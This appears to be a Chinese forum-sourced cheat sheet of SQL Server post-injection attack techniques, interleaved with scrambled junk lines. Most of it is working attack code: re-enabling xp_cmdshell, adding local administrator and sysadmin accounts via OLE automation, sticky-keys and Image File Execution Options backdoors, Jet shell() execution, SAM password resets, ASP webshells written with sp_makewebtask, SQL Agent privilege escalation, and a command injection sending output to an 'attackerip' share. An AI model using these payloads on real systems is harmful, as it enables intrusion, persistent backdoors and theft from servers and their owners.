1 错误「未能找到存储过程 'master..xp_cmdshell'」（原文误写为 xpcmdshell）：说明 xp_cmdshell 的扩展存储过程登记已被删除，需用 EXEC master.dbo.sp_addextendedproc 重新登记，下面给出三种做法。在注入点上执行时，语句前后要各加一个空格和分号。
恢复方法：用查询分析器（原文“查询分离器”为笔误）连接后，
第一步执行：EXEC sp_addextendedproc 'xp_cmdshell', @dllname = 'xplog70.dll'
第二步执行：EXEC sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
（注意：DLL 名称必须与该版本 SQL Server 的 Binn 目录中实际存在的文件一致，否则会出现下面第 2 条的“无法装载 DLL”错误。）然后按 F5 键执行，命令执行完毕。
# U2 N: X2 I! f; |4 L1 Y) B# m8 [( Y. i0 ~( T
2 错误「无法装载 DLL xpsql70.dll 或该 DLL 所引用的某一 DLL。原因 126（找不到指定模块。）」：说明 xp_cmdshell 当前登记的 DLL 在磁盘上不存在（或它依赖的 DLL 缺失），要先删掉旧登记，再指向实际存在的 DLL 重新登记。
恢复方法：用查询分析器连接后，
第一步执行：EXEC master.dbo.sp_dropextendedproc 'xp_cmdshell'   （用单引号；原文的双引号在 QUOTED_IDENTIFIER ON 时会被当作标识符而报错）
第二步执行：EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'   （DLL 名称以服务器上实际存在的文件为准）
然后按 F5 键执行，命令执行完毕。
1 S0 }. N8 u) \/ y: e4 Z
3 错误「无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因：127（找不到指定的程序。）」：说明 xp_cmdshell 被登记到了一个并不导出该函数的 DLL 上。
恢复方法：用查询分析器连接后，
第一步执行：exec sp_dropextendedproc 'xp_cmdshell'
第二步执行：exec sp_addextendedproc 'xp_cmdshell', 'xpweb70.dll'
注意：原文第二步又指回了 xpweb70.dll，而错误信息恰恰说明这个 DLL 里没有 xp_cmdshell，照抄只会再次得到 127 错误；应改用本文第 1 条以及“上传 xplog70.dll 恢复 xp_cmdshell”一节所用的 xplog70.dll。然后按 F5 键执行，命令执行完毕。
2 v! M% K Z& c3 M4 C9 i
4 终极方法
如果以上方法均不可恢复，请尝试用下面的办法，通过 OLE 自动化（sp_oacreate / sp_oamethod 调用 wscript.shell）直接添加帐户：
用查询分析器连接后，
2000 Server 系统（cmd.exe 位于 c:\winnt\system32）：
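-- Windows 2000 Server: cmd.exe lives under c:\winnt\system32.
-- Creates a local user, then adds it to the local Administrators group, by
-- running net.exe through the WScript.Shell COM object. Needs the sp_OA*
-- procedures (odsole70.dll) and runs with the SQL Server service account's
-- rights, so it only works when that account may create local users.
-- Replace 新用户 / 密码 with the account name and password.
-- The original two one-liners ignored every return code and never destroyed
-- the COM object; the HRESULT is checked here so a failure is visible, and the
-- object is released afterwards.
DECLARE @shell INT, @hr INT

EXEC @hr = sp_oacreate 'wscript.shell', @shell OUTPUT
IF @hr <> 0 PRINT 'sp_oacreate failed (OLE automation disabled?)'

-- 'run' with the command line; a non-zero HRESULT means cmd.exe was not started
EXEC @hr = sp_oamethod @shell, 'run', NULL, 'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'
IF @hr <> 0 PRINT 'net user /add could not be launched'

EXEC @hr = sp_oamethod @shell, 'run', NULL, 'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'
IF @hr <> 0 PRINT 'net localgroup /add could not be launched'

EXEC sp_oadestroy @shell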
4 U9 p- k; k0 P# Y% ?( M# P
XP 或 2003 Server 系统（cmd.exe 位于 c:\windows\system32）：
6 J6 Q+ a7 P& P5 j1 B$ `
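-- Windows XP / Server 2003: cmd.exe lives under c:\windows\system32.
-- Same procedure as the 2000 variant: create a local user, then add it to the
-- local Administrators group via WScript.Shell. Needs the sp_OA* procedures
-- and the SQL Server service account must itself be allowed to manage users.
-- Replace 新用户 / 密码 with the account name and password.
-- Return codes are checked and the COM object is destroyed; the original
-- one-liners did neither.
DECLARE @shell INT, @hr INT

EXEC @hr = sp_oacreate 'wscript.shell', @shell OUTPUT
IF @hr <> 0 PRINT 'sp_oacreate failed (OLE automation disabled?)'

EXEC @hr = sp_oamethod @shell, 'run', NULL, 'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
IF @hr <> 0 PRINT 'net user /add could not be launched'

EXEC @hr = sp_oamethod @shell, 'run', NULL, 'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'
IF @hr <> 0 PRINT 'net localgroup /add could not be launched'

EXEC sp_oadestroy @shell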
|/ o$ l& W) @, @% u& G; ~ D; M$ g- k
五个 SHIFT（粘滞键后门：用 explorer.exe 覆盖 sethc.exe，再把它复制到 dllcache——推测是为了避免被系统文件保护还原）
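-- Sticky-keys backdoor: overwrites c:\windows\system32\sethc.exe with a copy
-- of explorer.exe, then copies the replaced file into dllcache as well
-- (presumably so Windows File Protection does not restore the original).
-- Uses Scripting.FileSystemObject.CopyFile through the sp_OA* procedures;
-- the copy runs with the SQL Server service account's rights.
-- One FSO object serves both copies and is released afterwards; the original
-- created two objects and never destroyed either.
DECLARE @fso INT, @hr INT

EXEC @hr = sp_oacreate 'scripting.filesystemobject', @fso OUT
IF @hr <> 0 PRINT 'sp_oacreate failed (OLE automation disabled?)'

-- overwrite the real sethc.exe (third CopyFile argument is the NULL result slot)
EXEC @hr = sp_oamethod @fso, 'copyfile', NULL, 'c:\windows\explorer.exe', 'c:\windows\system32\sethc.exe'
IF @hr <> 0 PRINT 'copy to system32\sethc.exe failed'

-- keep the dllcache copy consistent with what is now in system32
EXEC @hr = sp_oamethod @fso, 'copyfile', NULL, 'c:\windows\system32\sethc.exe', 'c:\windows\system32\dllcache\sethc.exe'
IF @hr <> 0 PRINT 'copy to dllcache\sethc.exe failed'

EXEC sp_oadestroy @fso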
xp_cmdshell 执行命令的另一种方法（过程名在运行时拼接，推测是为了绕过对 'xp_cmdshell' 字样的简单过滤）：
-- Builds the procedure name at run time ('xp_' + 'cmdshell') and calls it
-- through the variable, so the literal xp_cmdshell never appears in the batch.
-- Runs 'net user refdom 123456 /add' in the SQL Server service context.
DECLARE @procname sysname
SELECT @procname = 'xp_' + 'cmdshell'
EXEC @procname 'net user refdom 123456 /add'
" U& C s) p& v! X R# S3 ~- s
判断扩展存储过程是否存在：
) o: Q9 l: L$ l* h- c- JSelect count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'+ N! f: x! B- {9 g$ X
返回结果为 1 就说明登记还在，可以直接调用。
" Y. H$ L7 Z/ U* l
上传 xplog70.dll 后恢复 xp_cmdshell 的语句（DLL 路径可以是任意 SQL Server 服务帐户可读的位置，如下例的 E:\newche2\about）：
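-- Registers xp_cmdshell against an uploaded copy of xplog70.dll.
-- The path must be readable by the SQL Server service account, and the DLL is
-- loaded into the SQL Server process when the procedure is first called, so
-- an xplog70.dll outside the Binn directory is a strong forensic indicator.
-- sp_addextendedproc requires sysadmin.
EXEC sp_addextendedproc 'xp_cmdshell', @dllname = 'E:\newche2\about\XPLOG70.DLL'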
& n$ k$ S3 |- g9 M
否则把 xplog70.dll（原文“xplog7.0.dll”为笔误）上传到系统目录后再登记：
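-- Same registration, pointing at a copy placed in the system directory.
-- The original called master.dbo.addextendedproc, which does not exist;
-- the procedure is sp_addextendedproc.
EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'C:\WinNt\System32\xplog70.dll'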
$ Y# D! Q1 h) x' i
! G2 U0 d$ x$ j8 f
+ Z* k5 _3 c$ G
首先把 Jet 引擎的 SandBoxMode 改为 1（按 Microsoft 对该键值的说明，1 表示只对 Access 启用沙箱、对其他程序关闭，因此 SQL Server 发起的 Jet 查询里才能调用 shell()；原文“开启沙盘模式”说反了）：
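-- Sets HKLM\SOFTWARE\Microsoft\Jet\4.0\Engines\SandBoxMode = 1 (REG_DWORD).
-- Per Microsoft's documentation of this value, 1 keeps the sandbox for Access
-- only and disables it for other callers, which is what lets the OPENROWSET
-- query below call shell(). Needs xp_regwrite (xpstar.dll) and the service
-- account must be able to write HKLM.
EXEC master..xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode', 'REG_DWORD', 1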
4 E. `7 [5 q5 f+ h5 h* H6 n! D$ J4 N s
然后利用 Jet OLE DB provider 通过 OPENROWSET 执行系统命令（需要 Ad Hoc Distributed Queries 已开启，见后文 SQL2005 一节）：
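-- Opens an arbitrary .mdb through the Jet provider and evaluates shell() inside
-- the Jet query, which runs the command in the SQL Server service context.
-- Any readable .mdb works as the "database="; ias.mdb is just a well-known
-- default path. Fails if SandBoxMode still restricts non-Access callers or
-- if ad hoc distributed queries are disabled.
SELECT *
FROM OPENROWSET('microsoft.jet.oledb.4.0',
                ';database=c:\winnt\system32\ias\ias.mdb',
                'select shell("cmd.exe /c net user admin admin1234 /add")')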
如果返回“不能找到 c:\windows\system32\ias\ias.mdb”错误，用 exec master..xp_dirtree 'c:\windows\system32\ias',1,1-- 列目录确认（原文路径多写了一级 ias）：本例中 ias.mdb 以及另一个 .mdb 都已不在，应该是被管理员删掉了；这时需要换一个服务帐户可读的 .mdb 文件。
- j. e1 n& s% {6 t, u
6 k3 n5 w+ J( u$ j! Q
2 o |3 i! |( r4 q( F c+ a; W. U3 l G C* e
恢复 sp_addextendedproc 本身（如果它也被删掉了）的过程定义如下，这是 SQL Server 自带的系统过程原文，应在 master 库中执行：
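-- Original definition of the system procedure sp_addextendedproc
-- (SQL Server, dated 1996/08/30). Recreate it in master if it has been
-- dropped; the recovery steps on this page depend on it.
--   @functname : (owner.)name of the extended procedure to register
--   @dllname   : DLL that exports the function
-- Returns 0 on success, 1 (after raising error 15002) when called inside an
-- open transaction — presumably because DBCC addextendedproc is not
-- transactional.
create procedure sp_addextendedproc --- 1996/08/30 20:13
    @functname nvarchar(517),   /* (owner.)name of function to call */
    @dllname   varchar(255)     /* name of DLL containing function */
as
    set implicit_transactions off
    if @@trancount > 0
    begin
        raiserror(15002, -1, -1, 'sp_addextendedproc')
        return (1)
    end
    dbcc addextendedproc(@functname, @dllname)
    return (0) -- sp_addextendedproc
GO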
. O9 R. |' _ h
7 R5 f2 F' i6 ~4 b9 ^+ y0 n* b% M
! r" j' @( n6 r. s7 P6 ~
导出管理员密码文件（直接改 SAM 里 Administrator 的口令，用完再还原，不用克隆帐户）
sa 默认“应该”可以读 SAM 键——实际上取决于 SQL Server 服务帐户：HKLM\SAM 默认只有 SYSTEM 有读写权限，以 LocalSystem 运行的实例可以，以普通帐户运行的则不行。
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg   （000001F4 = RID 500，即内置 Administrator）
net user administrator test
用 administrator 登陆。
用完机器后
reg import c:\old.reg   （原文写的是 c:\test.reg，与上面导出的文件名不一致；应导入刚才导出的那个文件，否则旧口令不会还原）
根本不用克隆。
要改其他帐户时，找到对应的 SID/RID，把 000001F4 换成该帐户的 RID。
1 K$ y5 N5 x5 J8 R
1 a1 f0 y8 a! h) _5 c5 T5 X, Z, Z" N% x4 y& ^
8 B- m, M$ d* k
恢复所有（常用的）扩展存储过程——按所在 DLL 分组，需在 master 库中以 sysadmin 身份执行：
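-- Re-registers the extended stored procedures this page relies on, grouped by
-- the DLL that exports them. Must run in master; sp_addextendedproc requires
-- sysadmin. xp_cmdshell itself is not in this list (see the sections above).
USE master

-- xplog70.dll
EXEC sp_addextendedproc xp_enumgroups,          'xplog70.dll'
EXEC sp_addextendedproc xp_loginconfig,         'xplog70.dll'

-- xpstar.dll: drive / file / error-log helpers
EXEC sp_addextendedproc xp_fixeddrives,         'xpstar.dll'
EXEC sp_addextendedproc xp_enumerrorlogs,       'xpstar.dll'
EXEC sp_addextendedproc xp_getfiledetails,      'xpstar.dll'
EXEC sp_addextendedproc xp_availablemedia,      'xpstar.dll'

-- xpstar.dll: registry access (xp_regwrite is what the IFEO backdoor uses)
EXEC sp_addextendedproc xp_regaddmultistring,   'xpstar.dll'
EXEC sp_addextendedproc xp_regdeletekey,        'xpstar.dll'
EXEC sp_addextendedproc xp_regdeletevalue,      'xpstar.dll'
EXEC sp_addextendedproc xp_regenumvalues,       'xpstar.dll'
EXEC sp_addextendedproc xp_regread,             'xpstar.dll'
EXEC sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
EXEC sp_addextendedproc xp_regwrite,            'xpstar.dll'

-- odsole70.dll: OLE automation (needed by every sp_oacreate example here)
EXEC sp_addextendedproc sp_OACreate,            'odsole70.dll'
EXEC sp_addextendedproc sp_OADestroy,           'odsole70.dll'
EXEC sp_addextendedproc sp_OAGetErrorInfo,      'odsole70.dll'
EXEC sp_addextendedproc sp_OAGetProperty,       'odsole70.dll'
EXEC sp_addextendedproc sp_OAMethod,            'odsole70.dll'
EXEC sp_addextendedproc sp_OASetProperty,       'odsole70.dll'
EXEC sp_addextendedproc sp_OAStop,              'odsole70.dll'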
' [* F" Q% s2 |* v+ p2 V* c% {9 m
建立一个读文本文件的存储过程（用 BULK INSERT 把文件逐行读入临时表再返回）：
" V {, y, L/ W1 M4 p- pCreate proc sp_readTextFile @filename sysname
4 a+ y, D5 \" [: ?as% B9 \" S# T9 l
# t% ?; w% x# i4 _- y$ w# W+ }! w7 g
begin
; V. t# `$ m' G6 g* p. V3 ^0 W set nocount on
- I+ `+ B* K) w: g" d# m Create table #tempfile (line varchar(8000))8 S! D) Q! o- h/ m9 N
exec ('bulk insert #tempfile from "' + @filename + '"')5 x3 g+ k8 m3 o" Z3 o: q$ f
select * from #tempfile, e7 x! G$ J' {5 O, v9 ]# Z
drop table #tempfile
/ e `; u0 A' S# X- H7 |End
1 y8 j; s1 x3 w8 P- ] }1 Q l: D9 s- E2 H- q) N
exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp'   —— 利用上面建立的存储过程读文件
查看登录用户（SQL 2000 的 master..sysxlogins 表，其中有登录名和 password 等列）：
Select * from master..sysxlogins
把文件内容读取到表中（目标表需先建好，列数/类型要与文件行匹配）：
BULK INSERT tmp FROM 'c:\test.txt'
delete from 表名   —— 清理表里的内容（不带 WHERE 会删掉整张表的数据）
create table b_test(fn nvarchar(4000));   —— 建一个表，字段为 fn
8 O3 X+ C" U- b# b7 P0 I6 T
3 g# d. w' ?0 t( v
3 O- I Y" F D5 p# Q1 w加sa用户: `! \4 Z% ~# H; C' g' Y7 F5 z
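-- Creates a SQL login and puts it in the sysadmin fixed server role.
-- Replace user / pass with real values; they must be quoted as strings
-- (unquoted, user is a reserved word and the batch fails). Both calls need
-- sysadmin on the caller's side.
EXEC master.dbo.sp_addlogin 'user', 'pass';
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin';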
- W7 A! S, I; b/ @. B/ Z: D
: e+ j, e. T0 r+ g! n9 I! W
7 g5 w8 y0 e/ K0 G( B9 h8 g2 h
读文件代码（用 scripting.filesystemobject 逐行读；需要 OLE 自动化过程可用，读取以 SQL Server 服务帐户的权限进行）：
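-- Reads a text file line by line through Scripting.FileSystemObject and PRINTs
-- each line. Needs the sp_OA* procedures (odsole70.dll) and runs in the SQL
-- Server service account's security context.
-- Replace 文件名 with the file path. Mode 1 = ForReading.
-- readline returns a non-zero HRESULT at end of file, which ends the loop.
-- The original never closed the stream or destroyed the COM objects; they are
-- released here so repeated runs do not accumulate objects in the process.
DECLARE @fso INT, @stream INT, @hr INT
DECLARE @line VARCHAR(8000)

EXEC sp_oacreate 'scripting.filesystemobject', @fso OUT
EXEC sp_oamethod @fso, 'opentextfile', @stream OUT, '文件名', 1

EXEC @hr = sp_oamethod @stream, 'readline', @line OUT
WHILE (@hr = 0)
BEGIN
    PRINT @line
    EXEC @hr = sp_oamethod @stream, 'readline', @line OUT
END

EXEC sp_oamethod @stream, 'close'
EXEC sp_oadestroy @stream
EXEC sp_oadestroy @fso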
, Z) I) N9 K/ |
写文件代码（示例直接覆盖 Serv-U 的 ServUDaemon.ini；createtextfile 第二个参数为 1 表示文件已存在时覆盖，原内容会丢失）：
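-- Writes one line to a file via Scripting.FileSystemObject.
-- createtextfile(..., 1) overwrites an existing file — here the Serv-U daemon
-- config, so its original contents are lost; take a copy first.
-- Replace 《内容》 with the text to write. The stream is closed explicitly so
-- the data is flushed before the COM objects are released; the original left
-- both the stream and the FSO object dangling.
DECLARE @fso INT, @stream INT, @hr INT

EXEC sp_oacreate 'scripting.filesystemobject', @fso OUT
EXEC sp_oamethod @fso, 'createtextfile', @stream OUT, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1
EXEC @hr = sp_oamethod @stream, 'writeline', NULL, '《内容》'
IF @hr <> 0 PRINT 'writeline failed'

EXEC sp_oamethod @stream, 'close'
EXEC sp_oadestroy @stream
EXEC sp_oadestroy @fso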
; ?3 r }/ g. p8 l% A$ y
添加 lake2 的 xp_cmdshell 替代品（自定义扩展存储过程 xplake2.dll，放在回收站目录 c:\recycler 下）：
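-- Registers a custom extended procedure from c:\recycler\xplake2.dll, runs a
-- command through it, then unregisters it. The original listed the drop before
-- the EXEC, which would make the EXEC fail; the drop belongs last.
-- sp_dropextendedproc does not unload the DLL from the SQL Server process;
-- DBCC xplake2 (FREE) is needed for that, otherwise it stays until restart.
EXEC sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
EXEC xp_lake2 'net user'
EXEC sp_dropextendedproc 'xp_lake2'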
9 l8 I U& N; c. J3 C. Z
得到硬盘文件信息（xp_dirtree 列目录）
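-- xp_dirtree arguments: directory, depth, whether to list files as well.
EXEC master..xp_dirtree 'c:'         -- subdirectories only, no depth limit given
EXEC master..xp_dirtree 'c:', 1      -- one level deep, directories only
EXEC master..xp_dirtree 'c:', 1, 1   -- one level deep, directories and files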
, G! ^; q( o1 L( W- x0 z' f. ]
读 Serv-U 配置信息（ServUDaemon.ini 含 FTP 帐户配置，常用于提权；需先建立上面的 sp_readTextFile）：
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'
$ _8 w O% I$ S" F4 P9 e3 A/ O e+ l- @* X* o9 z
通过 xp_regwrite 写 SHIFT 后门（映像劫持：在 Image File Execution Options 下给 sethc.exe 设 Debugger，登录界面按五次 Shift 启动的就是 cmd.exe）：
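-- Image File Execution Options hijack: Windows launches the Debugger value
-- instead of sethc.exe, so pressing Shift five times at the logon screen opens
-- cmd.exe in the logon session's (SYSTEM) context. Value type is REG_SZ.
-- NOTE(review): the trailing ' on' in the data is carried over from the
-- original; everything after the executable path is passed to cmd.exe as
-- arguments, so 'c:\windows\system32\cmd.exe' alone is the safer form.
EXEC master..xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe', 'debugger', 'REG_SZ', 'c:\windows\system32\cmd.exe on';--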
! q e( Y1 D+ q" H
; N. Y8 g |/ T, _' L# `& N6 X) | h% a$ f2 n9 j5 P
; C3 H% A5 ?! W$ I
找到 web 路径（可用 exec master.dbo.xp_subdirs 'd:\web\www.xx.com' 列子目录），然后用 sp_makewebtask 把一句话木马写成 .asp 文件：
exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp', 'select ''<%execute(request("SB"))%>'''   —— 备份一个小马就可以了（sp_makewebtask 把查询结果输出成 HTML 文件，文件里的 ASP 标签会被 IIS 照常解释执行）
2 K g K/ O4 I+ j8 K" R2 u
EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp', @query = 'SELECT 你的字段 FROM 你建的临时表'   （原文用了中文弯引号 ‘，必须用英文单引号）
: q4 s5 ?% `* B9 d, E$ E* d/ \* q) K4 B& t* V
8 ?. c2 m3 ^. N# m" a6 k6 r
SQL Server 2005 下开启 xp_cmdshell 的办法（2005 起默认关闭，需要 sysadmin 通过 sp_configure 打开）：
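-- SQL Server 2005+: xp_cmdshell is off by default. 'show advanced options'
-- must be enabled first, then the option itself, each followed by RECONFIGURE.
-- Needs ALTER SETTINGS (sysadmin / serveradmin).
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;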
( l8 o; M& ^" J8 ^* P7 |
SQL 2005 开启 OPENROWSET/OPENDATASOURCE 支持（Ad Hoc Distributed Queries，前面 Jet shell() 一节也依赖它）的方法：
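-- Enables ad hoc OPENROWSET/OPENDATASOURCE queries (off by default on 2005+).
-- Same two-step sp_configure pattern; needs ALTER SETTINGS.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries', 1; RECONFIGURE;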
{; J3 L6 X2 [5 E2 h, v7 X" V/ v$ M
SQL 2005 开启 sp_oacreate 等 OLE 自动化过程（Ole Automation Procedures）的方法：
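-- Enables the sp_OA* procedures (off by default on 2005+), which every
-- wscript.shell / filesystemobject example on this page needs.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;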
" o e5 S8 A5 ]5 Y" F; g+ r0 x
! ?2 p3 [) |6 R9 _. y
1 ^" j; d$ [8 p* }1 y: n) B) Z1 o* a5 c+ D( e0 i
: Q5 t+ T6 t) f' h' R$ W6 U- n1 E
8 _5 a7 z# o* j5 b# f5 c8 w# @0 [+ f: {
L7 y/ Y- I. i r6 z6 d
% l" y5 J- r; w6 \$ F- j4 l' U3 \, d$ y. s
5 O+ r0 D) b- t
1 n, ^7 Q8 V8 r& i7 y3 R$ N) ?* M0 X4 x3 M' H
( T I' X, N* H) {0 g
: U8 i4 A, i O4 p( c, c2 y k# Y/ G1 g6 ^& L" N: B
6 E* ~7 w5 s! v/ R g; _
$ m/ Q5 O: Y, S F {9 P# c; U) _4 L; h7 h4 l
Z( b* C: F) J, C% s4 K& e" x: s! \+ J2 v1 V* E0 R
- m# G( T1 c* ?
: D' K) A( ?" C; J7 `( d
; C; |2 I- |/ E以下方面不知道能不能成功暂且留下研究哈:. w( Q; }2 T7 A+ ~4 ]
4)
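-- Runs an OS command through a SQL Agent job with a CMDEXEC step. The job
-- must be created in msdb, not master. Needs SQLSERVERAGENT running, and
-- @server_name must be this instance's server name.
-- The string quotes were stripped when this was pasted from a forum; they are
-- restored here.
USE msdb;
EXEC sp_add_job @job_name = 'czy82';
EXEC sp_add_jobstep @job_name = 'czy82', @step_name = 'Exec my sql',
     @subsystem = 'CMDEXEC', @command = 'dir c:\>c:\b.txt';
EXEC sp_add_jobserver @job_name = 'czy82', @server_name = 'smscomputer';   -- replace with the real server name
EXEC sp_start_job @job_name = 'czy82';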
9 M5 P' ~8 ?2 h- B F# c3 S7 v1 Y9 a* E3 h$ j4 I5 f
利用 MSSQL 的作业处理也是可以执行命令的；而且如果上面的 @subsystem 参数是 TSQL，后面的 @command 就可以写 T-SQL 语句了。
对于这几个存储过程的使用：第一，@server_name 要指定你的 SQL 服务器名（可用 SELECT @@SERVERNAME 查到）；
第二，系统的 SQLSERVERAGENT 服务必须打开（默认没打开）：
net start SQLSERVERAGENT
对于这个东西还有一个地方不同，就是 public 角色也可以执行……这里也是有系统漏洞的，看下面的：
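-- Privilege escalation through a SQL Agent TSQL job step. According to the
-- original post, the xp_execresultset indirection is what lets a login that
-- can only create jobs reach xp_cmdshell — an old SQL Server 2000 Agent
-- issue; patched instances will refuse.
-- The quotes lost in the forum paste are restored. The step command is a
-- literal containing a literal containing a literal, so each level doubles
-- its single quotes; the double quotes inside are plain characters.
USE msdb
EXEC sp_add_job @job_name = 'GetSystemOnSQL',
     @enabled = 1,
     @description = 'This will give a low privileged user access to xp_cmdshell',
     @delete_level = 1
EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',
     @step_name = 'Exec my sql',
     @subsystem = 'TSQL',
     @command = 'exec master..xp_execresultset N''select ''''exec master..xp_cmdshell "dir > c:\agent-job-results.txt"'''''', N''Master'''
EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',
     @server_name = '你的SQL的服务器名'   -- replace with the real server name
EXEC sp_start_job @job_name = 'GetSystemOnSQL'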
6 @/ a+ E7 ?" E! c+ X3 A不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以
, L2 l+ {: a& \3 l4 J8 z才让我们可以以public执行xp_cmdshell. f7 b. T) Z b- g0 F3 p
8 C4 O4 i' g# j4 z
5) 关于 Microsoft SQL Agent Jobs 任意文件可删除/覆盖漏洞（public 用户也可以）：作业步骤的 @output_file_name 指到哪里，Agent 就往哪里写文件（推测是以 SQL Agent 服务帐户的权限写入，因此可以覆盖普通登录本来碰不到的文件）。
安焦有文章：http://www.xfocus.net/vuln/vul_view.php?vul_id=2968
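-- Arbitrary file create/overwrite through a SQL Agent job: the step's
-- @output_file_name is written by the Agent, so c:\sqlafc123.txt is created
-- (or overwritten) with the step's output. The quotes lost in the forum paste
-- are restored.
USE msdb
EXEC sp_add_job @job_name = 'ArbitraryFilecreate',
     @enabled = 1,
     @description = 'This will create a file called c:\sqlafc123.txt',
     @delete_level = 1
EXEC sp_add_jobstep @job_name = 'ArbitraryFilecreate',
     @step_name = 'SQLAFC',
     @subsystem = 'TSQL',
     @command = 'select ''hello, this file was created by the SQL Agent.''',
     @output_file_name = 'c:\sqlafc123.txt'
EXEC sp_add_jobserver @job_name = 'ArbitraryFilecreate',
     @server_name = 'SERVER_NAME'   -- replace with the real server name
EXEC sp_start_job @job_name = 'ArbitraryFilecreate'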
0 a/ `, ]6 j& _: F) K" d; [/ f
如果 subsystem 选的是 TSQL，在生成的文件的头部会有如下内容（原文乱码，“揂”“揝”是弯引号 “A、“S 被按 GBK 解码的结果；下面是还原后的大致样子：作业名、步骤号、步骤名和开始执行时间）：

Job 'ArbitraryFilecreate' : Step 1, 'SQLAFC' : Began Executing 2003-02-07 18:24:19
----------------------------------------------
hello, this file was created by the SQL Agent.

(1 row(s) affected)
/ V: w5 M5 @- A8 ^. Q. G% ]' f3 O* A; P8 C2 `, s7 ^. g
所以我建议要生成文件最好 subsystem 选 CMDEXEC（输出里应该就不会带这些头部）；如果利用得好，我们可以写一个含添加管理员命令的 .vbs 文件到启动目录！
! m0 K2 q3 F* X: W7 F
6) 关于 sp_makewebtask（可以写任意内容、任意文件名的文件）
关于 sp_MScopyscriptfile 看下面的例子（从示例看它把参数直接拼进一条 shell 命令，因此可以用 " 和 | 注入其他命令；原帖的引号已丢失，下面已补回）：
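-- sp_MScopyscriptfile builds a shell command from its arguments; the example
-- breaks out of the quoted file name with " and chains @command in with |.
-- Quotes lost in the forum paste are restored. The second argument of the
-- final call did not survive the paste and is assumed to be an empty string
-- (TODO confirm against the original advisory).
DECLARE @command VARCHAR(100)
DECLARE @scripfile VARCHAR(200)
SET CONCAT_NULL_YIELDS_NULL OFF
SELECT @command = 'dir c:\ > "\\attackerip\share\dir.txt"'
SELECT @scripfile = 'c:\autoexec.bat > nul" | ' + @command + ' | rd "'
EXEC sp_MScopyscriptfile @scripfile, ''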
这两个东西都还在测试中。
让 MSSQL 的 public 用户得到一个本机的 web shell（用 sp_makewebtask 把下面的 ASP 写成文件；原帖的引号被论坛过滤，“<P”也被吃掉了——如 method=" OST"、< RE>——下面已补回）：
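-- Writes an ASP command shell to disk with sp_makewebtask: the query result is
-- emitted as HTML, so the <% ... %> inside the literal lands in a.asp verbatim.
-- Quotes lost in the forum paste are restored: the @query literal is
-- 'select ''...''' (doubled quotes for the inner string; the ASP itself
-- contains no single quotes). The paste also dropped the "P" in
-- method="POST" and <PRE>; fixed below.
-- The ASP runs the submitted command via wscript.shell in the web server's
-- context, writes its output to a temp file under C:\, shows it, then deletes
-- it; On Error Resume Next hides every failure.
EXEC sp_makewebtask @outputfile = 'd:\sms\a.asp', @charset = 'gb2312',
-- @query = 'select ''<img src=vbscript:msgbox(now())>'''
-- @query = 'select ''<%response.write request.servervariables("APPL_PHYSICAL_PATH")%>'''
@query = 'select ''
<%On Error Resume Next
Set oscript = Server.createObject("wscript.SHELL")
Set oscriptNet = Server.createObject("wscript.NETWORK")
Set oFileSys = Server.createObject("scripting.FileSystemObject")
szCMD = Request.Form(".CMD")
If (szCMD <>"")Then
szTempFile = "C:\" & oFileSys.GetTempName()
Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0)
End If %>
<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">
</FORM><PRE>
<% If (IsObject(oFile))Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.deleteFile(szTempFile, True)
End If%>
</BODY></HTML>'''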
: ~, K' G6 p5 `" i9 e* d |